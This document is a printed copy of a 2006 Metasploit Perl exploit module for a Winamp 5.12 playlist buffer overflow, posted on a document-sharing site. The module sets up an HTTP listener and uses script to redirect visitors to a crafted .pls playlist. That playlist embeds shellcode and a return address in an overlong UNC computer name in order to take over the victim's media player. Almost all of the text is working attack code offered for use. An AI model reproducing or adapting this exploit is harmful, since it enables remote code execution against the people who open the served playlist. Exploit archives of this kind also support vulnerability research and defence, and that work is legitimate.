Documents
Resources
Learning Center
Upload
Plans & pricing Sign in
Sign Out
Get this document free

Winamp 5.12 Crafted PLS Remote Buffer Overflow Exploit meta

VIEWS: 46 PAGES: 6

									                          Winamp 5.12 Crafted PLS Remote Buffer Overflow Exploit meta                     Page 1/6
  1
  2    ##
  3    # This file is part of the Metasploit Framework and may be redistributed
  4    # according to the licenses defined in the Authors field below. In the
  5    # case of an unknown or missing license, this file defaults to the same
  6    # license as the core Framework (dual GPLv2 and Artistic). The latest
  7    # version of the Framework can always be obtained from metasploit.com.
  8    ##
  9
  10   package Msf::Exploit::winamp_playlist_unc;
  11
  12   use   strict;
  13   use   base "Msf::Exploit";
  14   use   Pex::Text;
  15   use   IO::Socket::INET;
  16   use   IPC::Open3;
  17
  18    my $advanced =
  19     {
  20           ’Gzip’           => [1, ’Enable gzip content encoding’],
  21           ’Chunked’        => [1, ’Enable chunked transfer encoding’],
  22           ’Humor’           => [0, ’Enable humorous song names’],
  23     };
  24
  25   my $info =
  26     {
  27           ’Name’                 => ’Winamp Playlist UNC Path Computer Name Overflow’,
  28           ’Version’            => ’$Revision: 1.3 $’,
  29           ’Authors’            =>
  30             [
  31                       ’H D Moore <hdm [at] metasploit.com’,
  32                       ’Faithless <rhyskidd [at] gmail.com>’,
  33                ],
  34
  35             ’Description’    =>
  36               Pex::Text::Freeform(qq{
  37                        This module exploits a vulnerability in the Winamp media player.
  38             This flaw is triggered when a audio file path is specified, inside a
  39             playlist, that consists of a UNC path with a long computer name. This
  40             module delivers the playlist via the browser.
  41   }),
  42
  43             ’Arch’               => [ ’x86’ ],
  44             ’OS’                  => [ ’win32’, ’winxp’, ’win2003’ ],
  45             ’Priv’              => 0,
  46
  47             ’AutoOpts’       => { ’EXITFUNC’ => ’process’ },
  48             ’UserOpts’       =>
  49               {
  50                       ’HTTPPORT’ => [ 1, ’PORT’, ’The local HTTP listener port’, 8080           ],
  51                       ’HTTPHOST’ => [ 0, ’HOST’, ’The local HTTP listener host’, "0.0.0.0" ],
  52                       ’REALHOST’ => [ 0, ’HOST’, ’External address to use for redirects (NAT)’ ],
H D Moore                                                                                                 01/31/2006
                         Winamp 5.12 Crafted PLS Remote Buffer Overflow Exploit meta             Page 2/6
  53              },
  54
  55            ’Payload’            =>
  56              {
  57                        ’Space’    => 526,
  58                        ’BadChars’ => "\x00\x5c\x2f\x0a\x0d\x20",
  59                        ’Keys’      => [’−bind’],
  60
  61                        # Landing on \x5c\x5c trashes esp, restore from ecx
  62                        ’PrependEncoder’ => "\x87\xe1",
  63
  64                        # Disable nop sleds completely (dont modify ecx)
  65                        ’MinNops’ => 0,
  66                        ’MaxNops’ => 0,
  67              },
  68            ’Refs’                =>
  69              [
  70                        [’BID’, ’16410’],
  71                        [’URL’, ’http://milw0rm.com/id.php?id=1458/’],
  72                        [’URL’, ’http://secunia.com/advisories/18649/’],
  73              ],
  74
  75            ’DefaultTarget’ => 0,
  76            ’Targets’         =>
  77              [
  78                      # Return to exe, 0x0d is replaced by 0x00 >:−)
  79                      [ ’Winamp 5.12 Universal’, 0x0d45fece ]
  80              ],
  81
  82            ’Keys’                => [ ’winamp’ ],
  83
  84            ’DisclosureDate’ => ’Jan 29 2006’,
  85      };
  86
  87    sub new {
  88            my $class = shift;
  89            my $self = $class−>SUPER::new({’Info’ => $info, ’Advanced’ => $advanced}, @_);
  90            return($self);
  91    }
  92
  93    sub Exploit
  94    {
  95            my $self = shift;
  96            my $server = IO::Socket::INET−>new(
  97                    LocalHost => $self−>GetVar(’HTTPHOST’),
  98                    LocalPort => $self−>GetVar(’HTTPPORT’),
  99                    ReuseAddr => 1,
  100                   Listen    => 1,
  101                   Proto     => ’tcp’
  102               );
  103           my $client;
  104

H D Moore                                                                                        01/31/2006
                        Winamp 5.12 Crafted PLS Remote Buffer Overflow Exploit meta                                           Page 3/6
  105           # Did the listener create fail?
  106           if (not defined($server)) {
  107                   $self−>PrintLine("[−] Failed to create local HTTP listener on " . $self−>GetVar(’HTTPPORT’));
  108                   return;
  109           }
  110
  111           my $httphost = $self−>GetVar(’HTTPHOST’);
  112           $httphost = Pex::Utils::SourceIP(’1.2.3.4’) if $httphost eq ’0.0.0.0’;
  113
  114           $self−>PrintLine("[*] Waiting for connections to http://". $httphost .":". $self−>GetVar(’HTTPPORT’) ."/");
  115
  116           while (defined($client = $server−>accept())) {
  117                   $self−>HandleHttpClient(Msf::Socket::Tcp−>new_from_socket($client));
  118           }
  119
  120           return;
  121   }
  122
  123   sub HandleHttpClient
  124   {
  125           my $self = shift;
  126           my $fd     = shift;
  127
  128           # Set the remote host information
  129           my ($rport, $rhost) = ($fd−>PeerPort, $fd−>PeerAddr);
  130
  131           # Read the HTTP command
  132           my ($cmd, $url, $proto) = split / /, $fd−>RecvLine(10);
  133
  134           # Read the HTTP headers
  135           my $headers;
  136           while ( (my $line = $fd−>RecvLine(10))) {
  137                   $headers .= $line;
  138                   last if $line eq "\r\n";
  139           }
  140
  141           if ($url !~ /\.pls/i) {
  142                   $self−>PrintLine("[*] HTTP Client connected from $rhost:$rport, redirecting...");
  143                   my $content =
  144                           "<html><script>".
  145                           "document.location=’".RandomPath().".pls’".
  146                           "</script><body>".
  147                           "One second please...</body></html>";
  148
  149                     $fd−>Send($self−>BuildResponse($content));
  150                     $fd−>Close;
  151                     return;
  152           }
  153
  154           my $target_idx      = $self−>GetVar(’TARGET’);
  155           my $target          = $self−>Targets−>[$target_idx];
  156           my $shellcode       = $self−>GetVar(’EncodedPayload’)−>Payload;
H D Moore                                                                                                                     01/31/2006
                        Winamp 5.12 Crafted PLS Remote Buffer Overflow Exploit meta                                                     Page 4/6
  157
  158           my $name = Pex::Text::AlphaNumText(int(rand(32)+1));
  159           my $file = Pex::Text::AlphaNumText(1026);
  160
  161           substr($file, 1022, 4, pack(’V’, $target−>[1]));
  162           substr($file, 0, length($shellcode), $shellcode);
  163
  164           # Too many and it takes too long to load...
  165           my $pcnt = int(rand(10)+10);
  166           my $play =
  167                   "[playlist]\r\n".
  168
  169                               $self−>RandomNames($pcnt).
  170
  171                               "File".   ($pcnt+1). "=\\\\$file\r\n" .
  172                               "Title". ($pcnt+1). "=$name\r\n".
  173                               "Length". ($pcnt+1). "=".sprintf("%x",rand(1024)+1)."\r\n".
  174
  175                               "NumberOfEntries=".($pcnt+1)."\r\n".
  176                               "Version=2\r\n";
  177
  178           $self−>PrintLine("[*] HTTP Client connected from $rhost:$rport, sending ".length($shellcode)." bytes of payload...");
  179
  180
  181           $fd−>Send($self−>BuildResponse($play, "audio/x−scpls"));
  182
  183           # Prevents IE from throwing an error in some cases
  184           select(undef, undef, undef, 0.1);
  185
  186           $fd−>Close();
  187   }
  188
  189   sub RandomPath {
  190           my $self = shift;
  191           my $path;
  192
  193           while (length($path) < 32) {
  194                   $path .= "/" . Pex::Text::AlphaNumText(int(rand(30) + 5));
  195           }
  196           return $path;
  197   }
  198
  199   sub RandomNames {
  200           my $self = shift;
  201           return $self−>RandomNamesFun(@_) if $self−>GetVar(’Humor’);
  202           my $scnt = shift;
  203
  204           my $ppad = ’’;
  205
  206           for my $idx (1..$scnt) {
  207                   my $pname = Pex::Text::AlphaNumText(int(rand(32)+1));
  208                   my $pfile = Pex::Text::AlphaNumText(int(rand(32)+1)).".mp3";
H D Moore                                                                                                                               01/31/2006
                        Winamp 5.12 Crafted PLS Remote Buffer Overflow Exploit meta           Page 5/6
  209                     $ppad .=
  210                             "File".    ($idx). "=".$pfile."\r\n" .
  211                             "Title". ($idx). "=".$pname."\r\n".
  212                              "Length". ($idx). "=".sprintf("%x",rand(1024)+1)."\r\n";
  213           }
  214           return $ppad;
  215   }
  216
  217   sub BuildResponse {
  218            my ($self, $content, $ctype) = @_;
  219            $ctype ||= "text/html";
  220
  221           my $response =
  222             "HTTP/1.1 200 OK\r\n" .
  223             "Content−Type: $ctype\r\n";
  224
  225           if ($self−>GetVar(’Gzip’)) {
  226                    $response .= "Content−Encoding: gzip\r\n";
  227                    $content = $self−>Gzip($content);
  228           }
  229           if ($self−>GetVar(’Chunked’)) {
  230                    $response .= "Transfer−Encoding: chunked\r\n";
  231                    $content = $self−>Chunk($content);
  232           } else {
  233                    $response .= ’Content−Length: ’ . length($content) . "\r\n" .
  234                      "Connection: close\r\n";
  235           }
  236
  237           $response .= "\r\n" . $content;
  238
  239           return $response;
  240   }
  241
  242   sub Chunk {
  243           my ($self, $content) = @_;
  244
  245           my $chunked;
  246           while (length($content)) {
  247                   my $chunk = substr($content, 0, int(rand(10) + 1), ’’);
  248                   $chunked .= sprintf(’%x’, length($chunk)) . "\r\n$chunk\r\n";
  249           }
  250           $chunked .= "0\r\n\r\n";
  251
  252           return $chunked;
  253   }
  254
  255   sub Gzip {
  256           my $self = shift;
  257           my $data = shift;
  258           my $comp = int(rand(5))+10;
  259
  260           my($wtr, $rdr, $err);
H D Moore                                                                                     01/31/2006
                         Winamp 5.12 Crafted PLS Remote Buffer Overflow Exploit meta         Page 6/6
  261
  262            my $pid = open3($wtr, $rdr, $err, ’gzip’, ’−’.$comp, ’−c’, ’−−force’);
  263            print $wtr $data;
  264            close ($wtr);
  265            local $/;
  266
  267            return (<$rdr>);
  268   }
  269
  270
  271   sub RandomNamesFun {
  272           my $self = shift;
  273           my $scnt = shift;
  274           my @ffun =
  275           (
  276                   "Angelina vs Rosie O − Butter Time",
  277                   "Richards Gerbil Adventure",
  278                   "Elton John Bachelor Party",
  279                   "Paris Hilton Greased Chihuahua",
  280                   "OH MY GOD",
  281                   "SOMEONE IS OWNING",
  282                   "MY WINAMP!",
  283           );
  284
  285            my $ppad = ’’;
  286
  287            for my $idx (1..$scnt) {
  288                    my $pname = $ffun[ $idx % scalar(@ffun) ];
  289                    $ppad .=
  290                            "File".    ($idx). "=".$pname."\r\n" .
  291                            "Title". ($idx). "=".$pname."\r\n".
  292                             "Length". ($idx). "=".sprintf("%x",rand(1024)+1)."\r\n";
  293            }
  294            return $ppad;
  295   }
  296   1;
  297
  298   # milw0rm.com [2006−01−31]




H D Moore                                                                                    01/31/2006

								
To top